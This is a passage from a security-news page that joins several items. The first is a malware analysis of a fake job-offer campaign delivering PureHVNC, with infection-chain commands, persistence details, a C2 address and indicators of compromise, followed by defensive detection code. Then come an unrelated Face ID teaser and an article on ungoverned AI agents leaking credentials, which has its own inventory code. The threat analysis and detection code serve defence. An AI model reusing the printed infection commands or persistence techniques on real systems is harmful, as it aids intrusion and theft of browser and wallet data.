example:</p><ul class="wp-block-list"> <li><code>{CompanyName}_GlobalLogistics_Ad_Strategy.zip</code></li> <li><code>Project_Information_Summary_2026.zip</code></li> <li><code>{CompanyName} Project 2026 Interview Materials.zip</code></li> <li><code>{CompanyName}_Company_and_Job_Overview.pdf.rar</code></li> <li><code>Collaboration Project with {CompanyName} Company 2026.zip</code></li> </ul><p>The lures use the names of well-known companies, particularly in the financial, logistics, technology, sustainability and energy sectors. 
Impersonating legitimate organizations adds credibility to their campaign.</p><h2 class="wp-block-heading" id="h-what-happens-after-you-download-the-file">What happens after you download the file</h2><p>The ZIP archives usually contain legitimate files (such as PDFs of job descriptions) and an executable file along with a DLL, typically named <code>msimg32.dll</code>. The DLL is executed via DLL hijacking (tricking a legitimate program into loading malicious code), although the technique has undergone multiple modifications and upgrades over time.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="497" height="701" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/google-form-pdf-image-1.png" alt="Legitimate PDFs are present in some ZIP files, like this one pretending to be a job description from a real company." class="wp-image-390430"><figcaption class="wp-element-caption">Legitimate PDFs are present in some ZIP files, like this one masquerading as a real job description.</figcaption></figure><h2 class="wp-block-heading" id="h-analysis-of-the-malicious-campaign">Analysis of the malicious campaign</h2><p>We identified multiple variants of this campaign, each using different methods to extract the archive, distinct Python code, and varying folder structures. Across these variants, the campaign typically includes an executable file along with a DLL hidden in a separate folder. In some cases, attackers also include legitimate files related to the lure’s theme, enhancing the overall credibility of the attack.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="872" height="157" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_35cd55.png" alt="Example of files present in one of the archives analyzed." 
class="wp-image-390222"><figcaption class="wp-element-caption">Example of files present in one of the archives analyzed.</figcaption></figure><p>The malicious code is present in the DLL, and carries out various operations, including:</p><ul class="wp-block-list"> <li>Decrypting strings with a simple XOR, in this case with the “4B” key.</li> <li>Detecting debugging and sandboxing with <code>IsDebuggerPresent()</code> and <code>time64()</code>, and displaying the error “This software has expired or debugger detected” if triggered.</li> <li>Deleting itself, then dropping and launching a fake PDF.</li> <li>Achieving persistence via the registry key <code>CurrentVersion\Run\Miroupdate</code>.</li> <li>Extracting the “final.zip” archive and running it.</li> </ul><p>In this case, the PDF was started with the following command:</p><p><code>cmd.exe /c start "" "C:\Users\user\Desktop\Marketing Director Assessment Project\Marketing_Director_Assessment_Project.pdf"</code></p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="815" height="890" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_bbc624.png" alt="The PDF opened during the infection chain." class="wp-image-390231"><figcaption class="wp-element-caption">The PDF opened during the infection chain.</figcaption></figure><p>The archive <code>final.zip</code> is unzipped using different commands across the analyzed campaigns into a random folder under <code>ProgramData</code>. 
In this example, the <code>tar</code> command is used:</p><p><code>cmd.exe /c tar -xf "C:\ProgramData\{random folder}\{random folder}\final.zip" -C "C:\ProgramData\{random folder}\{random folder}" &gt;nul 2&gt;&amp;1</code></p><p>The zip contains several files associated with Python and the next stage.</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="385" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_2bfbd9.png?w=1024" alt="Python files compressed into a random folder in ProgramData." class="wp-image-390233"><figcaption class="wp-element-caption">Python files compressed into a random folder in ProgramData.</figcaption></figure><p>Next, an obfuscated Python script called <code>config.log</code> is executed. It ultimately decodes and runs a Donut shellcode. This script appears under different names (e.g., <code>image.mp3</code>) and formats in the different chains analyzed.</p><p><code>"C:\ProgramData\{random folder}\{random folder}\pythonw.exe" "C:\ProgramData\{random folder}\{random folder}\config.log"</code></p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="447" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_12924c.png?w=1024" alt="Obfuscated Python script that ultimately loads the Donut shellcode." class="wp-image-390226"><figcaption class="wp-element-caption">Obfuscated Python script that ultimately loads the Donut shellcode.</figcaption></figure><p>At the end of the infection chain, PureHVNC was injected into <code>SearchUI.exe</code>. 
The injected process may vary across the analyzed samples.</p><p>PureHVNC executes the following WMI queries to gather information about the compromised device:</p><ul class="wp-block-list"> <li><code>SELECT * FROM AntiVirusProduct</code></li> <li><code>SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')</code></li> <li><code>SELECT Caption FROM Win32_OperatingSystem</code></li> </ul><p>For persistence, it creates a scheduled task using a base64-PowerShell command, with the flag <code>“-RunLevel Highest”</code> if the user has admin rights.</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="567" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/powershell-commnand-for-scheduled-task.png?w=1024" alt="" class="wp-image-390414"><figcaption class="wp-element-caption">PowerShell command for the Scheduled Task</figcaption></figure><p>PureHVNC performs enumeration to exfiltrate information related to various browsers, extensions, and cryptocurrency wallets.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="875" height="632" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_2a7963.png" alt="Methods related to wallet and browser data exfiltration." class="wp-image-390221"></figure><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="988" height="647" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_a587b6.png" alt="Methods related to wallet and browser data exfiltration." 
class="wp-image-390230"><figcaption class="wp-element-caption">Methods related to wallet and browser data exfiltration.</figcaption></figure><p>The malware configuration is encoded with base64 and compressed with GZIP.</p><p>In this case, the configuration includes:</p><ul class="wp-block-list"> <li><strong>C2</strong>: <code>207.148.66.14</code></li> <li><strong>C2 ports</strong>: <code>56001, 56002, 56003</code></li> <li><strong>Campaign ID</strong>: <code>Default</code> </li> <li><strong>Sleeping Flag</strong>: <code>0</code></li> <li><strong>Persistence Path</strong>: <code>APPDATA</code></li> <li><strong>Mutex Name</strong>: <code>Rluukgz</code> </li> </ul><h2 class="wp-block-heading" id="h-how-to-stay-safe">How to stay safe</h2><p>Using Google Forms is a highly effective method for distributing malware. Attackers are relying on trust in familiar tools like Google Forms, Dropbox, and LinkedIn, and impersonating legitimate companies to get past your guard.</p><p>If you deal with job offers, partnerships, or project work online, this is worth paying attention to:</p><ul class="wp-block-list"> <li>Always check the origin of Google Forms, don’t enter sensitive information, and don’t download files unless you fully trust the source.</li> <li>Verify requests through official company channels before engaging.</li> <li>Be wary of links hidden behind URL shorteners or redirects.</li> </ul><h2 class="wp-block-heading" id="h-indicators-of-compromise-iocs">Indicators of Compromise 
(IOCs)</h2><p><strong>IP</strong></p><p><code>207.148.66.14</code></p><p><strong>URL</strong></p><p><code>https://goo[.]su/CmLknt7</code></p><p><code>https://www.fshare[.]vn/file/F57BN4BZPC8W</code></p><p><code>https://tr[.].ee/R9y0SK</code></p><p><code>https://dl.dropbox[.]com/scl/fi/52sgtk50j285hmde2ycry/Overview-of-the-MSI-Accounting-Project.rar?rlkey=9qmunvcp8oleeycld08gqwup9</code></p><p><strong>Pro tip: </strong>This is only a partial list of malicious URLs. Download the <a href="https://www.malwarebytes.com/browserguard" rel="noreferrer noopener">Malwarebytes Browser Guard plugin</a> for full protection and to block the remaining malicious domains.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/that-job-brief-on-google-forms-could-infect-your-device">https://www.malwarebytes.com/blog/threat-intel/2026/03/that-job-brief-on-google-forms-could-infect-your-device</a> </p>
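<p>The process and registry behaviours listed in the analysis above (the <code>tar</code> extraction under <code>ProgramData</code>, <code>pythonw.exe</code> running a non-Python file name, the <code>Miroupdate</code> Run value and the encoded PowerShell task with <code>-RunLevel Highest</code>) can be combined into host-level triage logic. The following is an added example, not code from Malwarebytes: the event field names (<code>host</code>, <code>command_line</code>, <code>target_object</code>), the sample events and the two-stage alert threshold are constructed assumptions.</p>

```python
import base64
import re
from collections import defaultdict
from pathlib import PureWindowsPath

PY_SUFFIXES = {".py", ".pyw", ".pyc"}


def tokens(cmdline):
    """Split a Windows command line into tokens, honouring double quotes (simplified)."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def in_programdata(path):
    return path.lower().startswith("c:\\programdata\\")


def tar_from_programdata(ev):
    """tar -xf unpacking a .zip that itself sits under ProgramData."""
    t = [x.lower() for x in tokens(ev.get("command_line", ""))]
    if not any(PureWindowsPath(x).name in ("tar", "tar.exe") for x in t):
        return False
    return "-xf" in t and any(in_programdata(x) and x.endswith(".zip") for x in t)


def pythonw_non_py(ev):
    """Python interpreter under ProgramData whose script argument is not a Python file."""
    t = tokens(ev.get("command_line", ""))
    if len(t) < 2 or not in_programdata(t[0]):
        return False
    if PureWindowsPath(t[0]).name.lower() not in ("python.exe", "pythonw.exe"):
        return False
    script = t[1]
    return not script.startswith("-") and PureWindowsPath(script).suffix.lower() not in PY_SUFFIXES


def run_key_miroupdate(ev):
    """Registry write to the Run value name reported in the article."""
    return ev.get("target_object", "").lower().endswith("\\currentversion\\run\\miroupdate")


def encoded_task_highest(ev):
    """PowerShell -EncodedCommand whose decoded (UTF-16LE) text asks for -RunLevel Highest."""
    t = tokens(ev.get("command_line", ""))
    if not t or PureWindowsPath(t[0]).name.lower() not in ("powershell.exe", "pwsh.exe"):
        return False
    for flag, value in zip(t[1:], t[2:]):
        f = flag.lower()
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and the alias -ec.
        if len(f) >= 2 and ("-encodedcommand".startswith(f) or f == "-ec"):
            try:
                text = base64.b64decode(value, validate=True).decode("utf-16-le", "ignore")
            except ValueError:
                continue
            if "-runlevel highest" in text.lower():
                return True
    return False


RULES = {
    "tar_programdata": tar_from_programdata,
    "pythonw_non_py": pythonw_non_py,
    "run_key_miroupdate": run_key_miroupdate,
    "encoded_task_highest": encoded_task_highest,
}


def triage(events, threshold=2):
    """Return {host: [matched stages]} for hosts showing at least `threshold` distinct stages."""
    hits = defaultdict(set)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[ev["host"]].add(name)
    return {h: sorted(s) for h, s in hits.items() if len(s) >= threshold}


# Constructed sample data: folder names, hosts and the encoded command are made up.
_ENC = base64.b64encode(
    "New-ScheduledTaskPrincipal -UserId $env:USERNAME -RunLevel Highest".encode("utf-16-le")
).decode()

EVENTS = [
    {"host": "WS-01", "command_line": r'cmd.exe /c tar -xf "C:\ProgramData\kq3x\v81b\final.zip" -C "C:\ProgramData\kq3x\v81b" >nul 2>&1'},
    {"host": "WS-01", "command_line": r'"C:\ProgramData\kq3x\v81b\pythonw.exe" "C:\ProgramData\kq3x\v81b\config.log"'},
    {"host": "WS-01", "target_object": r"HKU\S-1-5-21-0\Software\Microsoft\Windows\CurrentVersion\Run\Miroupdate"},
    {"host": "WS-01", "command_line": f"powershell.exe -NoProfile -EncodedCommand {_ENC}"},
    # Benign look-alikes that must not alert.
    {"host": "WS-02", "command_line": r'"C:\Program Files\Python312\python.exe" "C:\src\build.py"'},
    {"host": "WS-02", "command_line": r'tar -xf "C:\Users\dev\backup.zip" -C "C:\Users\dev\restore"'},
    {"host": "WS-03", "command_line": r'"C:\ProgramData\VendorApp\pythonw.exe" "C:\ProgramData\VendorApp\agent.pyw"'},
]

if __name__ == "__main__":
    print(triage(EVENTS))
```

<p>Requiring two distinct stages per host keeps a lone <code>tar</code> or Python invocation from alerting, while the script-extension rule still fires when the file name varies (for example <code>image.mp3</code>).</p>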

When Face ID Helps iPhone Security—And When to Turn It Off

  • Adam Engst
  • Published date: 2026-03-19 21:42:27

Heading to a protest or crossing a border? Your iPhone’s Face ID—which is normally a boon with Stolen Device Protection—could become a liability. Learn when to disable biometrics and what other steps you can take to protect your privacy and data from compelle…

I’ve been thinking a lot more about physical iPhone security recently. For a long time, we’ve encouraged biometric authentication over manually entering iPhone passcodes because of the very real threat… [+10107 chars]

Tackling the Uncontrolled Growth of AI Agents in Modern SaaS Environments

  • Kolawole Samuel Adebayo
  • Published date: 2026-03-19 00:00:00

None

<p><span data-contrast="auto">By early 2026, the novelty phase of </span><a href="https://securityboulevard.com/2026/03/everyone-is-deploying-ai-agents-almost-nobody-knows-what-theyre-doing/"><span data-contrast="none">AI agents</span></a><span data-contrast="auto"> has officially ended. What began as excitement around automation has quietly evolved into a looming security risk across modern SaaS environments. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This shift was evident at the World Economic Forum, where executives </span><a href="https://africa.businessinsider.com/news/execs-at-davos-say-ais-biggest-problem-isnt-hype-its-security/dx3slep"><span data-contrast="none">discussed the future of AI</span></a><span data-contrast="auto">. Notably, their concerns were no longer about hype or a potential bubble. Instead, the conversation focused on security. As Raj Sharma, EY’s global managing partner of growth and innovation, explained, organizations are not talking enough about the security implications of AI agents — particularly how they are managed throughout their lifecycle.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Security experts sounded these warning bells months earlier. They pointed out that AI capabilities are advancing faster than the security controls meant to govern them. Despite their growing capabilities, many agents remain poorly monitored, loosely governed, and overly trusted.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">The consequences are already visible. 
According to </span><a href="https://www.sailpoint.com/press-releases/sailpoint-ai-agent-adoption-report" target="_blank" rel="noopener"><span data-contrast="none">research from SailPoint</span></a><span data-contrast="auto">, eight in ten organizations report that their AI agents have taken unintended actions, such as accessing unauthorized systems, sharing inappropriate data, or downloading sensitive information. What’s even more concerning is that nearly a quarter of respondents say their agents have been manipulated into revealing access credentials.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Ofer Klein, CEO and cofounder of </span><a href="https://www.reco.ai/" target="_blank" rel="noopener"><span data-contrast="none">Reco</span></a><span data-contrast="auto">, explained that the reason AI agents introduce such significant security risks is that they can independently interact with identities, data, and systems — often leaving businesses with limited visibility into what those agents are actually doing.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Despite these risks, adoption continues to grow. The same SailPoint research reveals a striking paradox: while 96% of technology professionals see AI agents as a growing security risk, 98% of organizations still plan to expand their use to maintain a competitive advantage. 
</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">The AI Agent Visibility Gap and Sprawl</span></b><span data-ccp-props='{"134245417":false,"134245418":false,"134245529":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":120,"335559740":240}'> </span></h3><p><span data-contrast="auto">A growing visibility gap is emerging between what AI agents are actually running inside organizations and what security teams believe they own. That gap is said to be where the next wave of </span><a href="https://securityboulevard.com/2023/11/identifying-security-misconfiguration-in-enterprise-networks/" target="_blank" rel="noopener"><span data-contrast="none">enterprise security</span></a><span data-contrast="auto"> incidents is likely to originate. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">According to a </span><a href="https://www.ciodive.com/news/cios-regret-ai-vendor-platform-decisions/812147/" target="_blank" rel="noopener"><span data-contrast="none">survey of 600 CIOs</span></a><span data-contrast="auto">, out of 87% of companies that have AI agents embedded in critical systems, only 25% report having full visibility into all agents currently operating in production.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This lack of oversight quickly shows up in the fundamentals of the agents’ security. Many organizations rely on authentication methods designed for a different era of non-human identities. For instance, some use static API keys, some rely on username-and-password combinations, while others depend on shared service accounts. 
These persistent credentials create long-lived access pathways — precisely the kind of access model that becomes risky when autonomous systems operate continuously across multiple platforms.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This visibility problem runs deeper than authentication. Nearly </span><a href="https://www.strata.io/resources/whitepapers/securing-autonomous-ai-agents-csa-survey-report-2026-strata-identity/" target="_blank" rel="noopener"><span data-contrast="none">80% of organizations</span></a><span data-contrast="auto"> deploying autonomous AI cannot confidently say what their agents are doing or who is responsible for them.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This lack of visibility is exactly what allows AI agent sprawl to emerge.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Without this basic visibility, organizations cannot answer fundamental governance questions like:</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">We Which agents exist</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" 
data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">Where they run</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">What systems they access; and</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">Who approved them</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></li></ul><p><span data-contrast="auto">Much like API sprawl or the </span><a href="https://securityboulevard.com/2026/03/saas-sprawl-has-become-the-new-shadow-it-why-traditional-security-struggles-to-see-and-stop-it/" target="_blank" rel="noopener"><span data-contrast="none">shadow IT</span></a><span data-contrast="auto"> era, this pattern starts with small, independent deployments. Marketing teams build agents for content generation, sales deploy agents for lead scoring, and finance automates invoice processing. Each solution works in isolation. 
Yet over time, agents multiply without centralized oversight.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Unlike shadow IT, however, AI agent sprawl evolves faster and is harder to detect. With low-code and no-code tools making it easy for any department to create agents, organizations often discover too late that dozens — or even hundreds — of autonomous systems are already operating across their SaaS environments.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">Why Not Use Traditional SaaS Security Tools?</span></b><span data-ccp-props='{"134245417":false,"134245418":false,"134245529":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":120,"335559740":240}'> </span></h3><p><span data-contrast="auto">Well, traditional </span><a href="https://securityboulevard.com/2023/11/top-10-saas-security-tools/" target="_blank" rel="noopener"><span data-contrast="none">SaaS security tools</span></a><span data-contrast="auto"> were designed for environments where humans interact directly with applications. However, the introduction of autonomous AI agents disrupts this model. AI agents often operate with permissions far broader than those granted to individual users, allowing them to span multiple systems and workflows. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">As a result, when users interact with these agents, they no longer access systems directly. 
Instead, they submit requests that the agent executes on their behalf, and those actions run under the agent’s identity rather than the user’s.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">This shift breaks the fundamentals of traditional access control and models, which brings significant agent security implications.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><a href="https://securityboulevard.com/2025/10/what-is-identity-and-access-management-iam/" target="_blank" rel="noopener"><span data-contrast="none">Identity Access Management (IAM)</span></a><span data-contrast="auto">, for example, usually uses the user’s identity to decide what they can do. But when an AI agent acts, authorization is evaluated against the agent’s privileges, not the requester’s. </span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><p><span data-contrast="auto">Consequently, a user with limited permissions can indirectly trigger actions or retrieve data they would not normally be allowed to access. Because logs and audit trails record the agent as the actor, these activities can occur without clear attribution or policy enforcement.</span><span data-ccp-props='{"134245417":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559740":240}'> </span></p><h3 aria-level="2"><b><span data-contrast="auto">Human-In-The-Loop Alone is Not Enough</span></b><span data-ccp-props='{"134245417":false,"134245418":false,"134245529":false,"201341983":0,"335551550":6,"335551620":6,"335559738":200,"335559739":120,"335559740":240}'> </span></h3><p><span data-contrast="auto">Many organizations are turning to human-in-the-loop (HITL) to mitigate these risks. 
This typically requires human validation before agents can access sensitive data, make system changes, approve financial transactions, or grant permissions. </span></p><p><span data-contrast="auto">While rational, this approach is more a symptom than a full strategy: it compensates for weak visibility rather than addressing the underlying governance gap.</span></p><p><span data-contrast="auto">HITL introduces a bottleneck that slows adoption and cannot scale across hundreds of autonomous agents. It also lacks mechanisms for out-of-band liveness checks or consent approvals, leaving organizations exposed to unchecked agent activity.</span></p><h3 aria-level="2"><b><span data-contrast="auto">Efficient AI Agent Sprawl Solutions</span></b></h3><p><span data-contrast="auto">To effectively manage AI agent sprawl, organizations need a structured approach that combines visibility, access control, and risk management. The following solutions outline how to discover, govern, and secure AI agents as they scale across modern SaaS environments.</span></p><ol><li aria-level="3"><b><span data-contrast="none"> Comprehensive AI Agent Inventory</span></b></li></ol><p><span data-contrast="auto">The first step toward controlling AI agent sprawl is achieving complete visibility.
Organizations need a single pane of glass that provides a unified view of every agent operating across their environment. </span></p><p><span data-contrast="auto">Whether agents are built on platforms like Amazon Bedrock, Google Vertex AI, or Azure AI and use frameworks such as LangChain, CrewAI, or AutoGen, they should all be catalogued in a centralized agent catalog. </span></p><p><span data-contrast="auto">This catalog acts as an authoritative inventory that continuously discovers and tracks agents across environments. It should identify who owns each agent, where it runs, what systems it connects to, and how it authenticates.</span></p><ol start="2"><li aria-level="3"><b><span data-contrast="none"> Access and Permission Mapping</span></b></li></ol><p><span data-contrast="auto">AI agents should begin with limited privileges. This is because agents interact with tools, APIs, and internal data sources through automated workflows; therefore, clear boundaries are essential to prevent unintended actions or data exposure. </span></p><p><span data-contrast="auto">Every agent should also receive its own unique identity with permissions scoped to its specific function rather than inheriting access from the deploying user.
From there, organizations can apply structured controls such as scoped permissions tied to particular business systems, time-bound credentials that automatically expire, and least-privilege policies that restrict unnecessary access.</span></p><ol start="3"><li aria-level="3"><b><span data-contrast="none"> Risk Identification, Prioritization &amp; Response</span></b></li></ol><p><span data-contrast="auto">Next, organizations should classify agents into risk tiers based on the sensitivity of the data they access and the potential impact of their decisions. Remediation should then be prioritized using automated risk scoring. This scoring combines two inputs: dynamic access analysis, which detects overprivileged or inactive agents, anomalies, or weak authentication, and breach-likelihood analysis of the vendors connected to these agents.</span></p><p><span data-contrast="auto">Reco is one example of a platform addressing this challenge. It inventories all AI agents in an environment and maps their access, permissions, connections, and overall risk posture. This visibility allows security teams to decide which agents should be sanctioned, restricted, or blocked before they introduce risk. The platform also provides guided remediation workflows that help organizations respond quickly to security issues.
For example, teams can revoke excessive permissions, disable unauthorized agents, or trigger automated responses through existing security workflows and ticketing systems.</span></p><h3 aria-level="2"><b><span data-contrast="auto">Embed Governance &amp; Visibility Early to Move Faster With AI Agents</span></b></h3><p><span data-contrast="auto">As AI-driven automation scales to thousands of SaaS applications, enterprises face a growing security blind spot. The solution isn’t slowing adoption; it’s embedding governance and observability from the start. By centralizing agent management on a platform like Reco Security, with full visibility and controls, organizations can deploy agents confidently, accelerate innovation, and scale.</span></p>
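<p>The inventory and risk-scoring steps described above can be sketched as follows. This is an added example, not code from the article or from any vendor platform: the record fields mirror what the article says a catalog should track (owner, where the agent runs, how it authenticates, what it can reach), while the scope names, thresholds, weighting and sample agents are constructed assumptions.</p>

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

NOW = datetime(2026, 3, 1, tzinfo=timezone.utc)    # fixed clock for a repeatable run
WEAK_AUTH = {"static_api_key", "shared_password"}  # assumed labels for weak methods
INACTIVE_AFTER = timedelta(days=30)                # assumed inactivity threshold

@dataclass
class Agent:
    name: str
    owner: Optional[str]               # who owns the agent
    platform: str                      # where it runs
    auth: str                          # how it authenticates
    granted: set                       # scopes the agent identity holds
    used: set                          # scopes observed in activity logs
    last_seen: datetime
    cred_expires: Optional[datetime]   # None means the credential never expires
    sensitive: bool = False            # touches sensitive data

def findings(a):
    out = []
    if not a.owner:
        out.append("no_owner")
    if a.auth in WEAK_AUTH:
        out.append("weak_auth")
    if a.cred_expires is None:
        out.append("non_expiring_credential")
    unused = sorted(a.granted - a.used)   # granted but never exercised
    if unused:
        out.append("overprivileged:" + ",".join(unused))
    if NOW - a.last_seen > INACTIVE_AFTER:
        out.append("inactive")
    return out

def tier(a):
    score = len(findings(a)) * (2 if a.sensitive else 1)  # assumed weighting
    return "high" if score >= 4 else "medium" if score >= 1 else "low"

def triage(inventory):
    order = {"high": 0, "medium": 1, "low": 2}
    rows = [(a.name, tier(a), findings(a)) for a in inventory]
    return sorted(rows, key=lambda r: order[r[1]])

# Constructed sample inventory (not real agents).
INVENTORY = [
    Agent("invoice-bot", "finance-ops", "Amazon Bedrock", "oauth_client_credentials",
          {"erp:read"}, {"erp:read"}, NOW - timedelta(days=1), NOW + timedelta(days=7), True),
    Agent("hr-helper", None, "Google Vertex AI", "static_api_key",
          {"hr:read", "hr:write", "drive:read"}, {"hr:read"}, NOW - timedelta(days=90), None, True),
    Agent("faq-bot", "support", "Azure AI", "oauth_client_credentials",
          {"kb:read", "tickets:write"}, {"kb:read"}, NOW - timedelta(days=2), NOW + timedelta(days=1)),
]
```

<p>Calling <code>triage(INVENTORY)</code> returns the agents ordered for remediation, each with the specific findings that drove its tier.</p>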